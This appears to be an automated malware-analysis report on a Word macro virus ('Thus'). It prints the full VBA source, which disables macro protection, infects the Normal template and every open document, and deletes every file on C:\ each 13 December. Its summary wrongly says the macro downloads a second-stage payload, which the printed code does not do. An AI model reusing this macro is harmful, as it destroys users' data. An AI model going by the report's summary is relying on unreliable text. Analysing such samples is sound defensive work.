MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Microsoft Word document containing VBA macros, specifically a Document_Open macro. The ClamAV detection 'Doc.Trojan.Thus-8' and the presence of an Equation Editor OLE object strongly suggest malicious intent. The VBA script appears to be designed to download and execute a second-stage payload, as indicated by the 'Thus_001' comment and the script's logic for copying and potentially executing code.
Heuristics 4
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Equation Editor OLE object high OLE_EQUATION_EDITORContains Equation Editor object — related to CVE-2017-11882 / CVE-2018-0802 exploitation, but CLSID presence alone is not the malformed MTEF exploit primitive.
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ClamAV: Doc.Trojan.Thus-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Thus-8
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VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
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Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() 'Thus_001' On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then NormalTemplate.VBProject.VBComponents.Item(1).C …
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
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macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2403 bytes |
SHA-256: ca4b87bd8c2215ef732bea004db9ae4556baaf83aaeaf6301676a95777a7ee94 |
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Detection
ClamAV:
Doc.Trojan.Thus-8
Obfuscation or payload:
unlikely
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Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() 'Thus_001' On Error Resume Next Application.Options.VirusProtection = False If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _ .CodeModule.CountOfLines End If If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _ .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _ .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _ .Item(1).CodeModule.CountOfLines) End If If NormalTemplate.Saved = False Then NormalTemplate.Save For k = 1 To Application.Documents.Count If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then Application.Documents.Item(k).VBProject.VBComponents.Item(1) _ .CodeModule.DeleteLines 1, Application.Documents.Item(k) _ .VBProject.VBComponents.Item(1).CodeModule.CountOfLines End If If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then Application.Documents.Item(k).VBProject.VBComponents.Item(1) _ .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _ .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _ .VBComponents.Item(1).CodeModule.CountOfLines) End If Next k If (Day(Now()) = 13) And (Month(Now()) = 12) Then With Application.FileSearch .NewSearch .LookIn = "C:\" .SearchSubFolders = True .FileName = "*.*" .MatchTextExactly = False .FileType = msoFileTypeAllFiles If .Execute > 0 Then For i = 1 To .FoundFiles.Count Kill .FoundFiles(i) Next i End If End With End If End Sub Private Sub Document_Close() Document_Open End Sub Private Sub Document_New() Document_Open End Sub |
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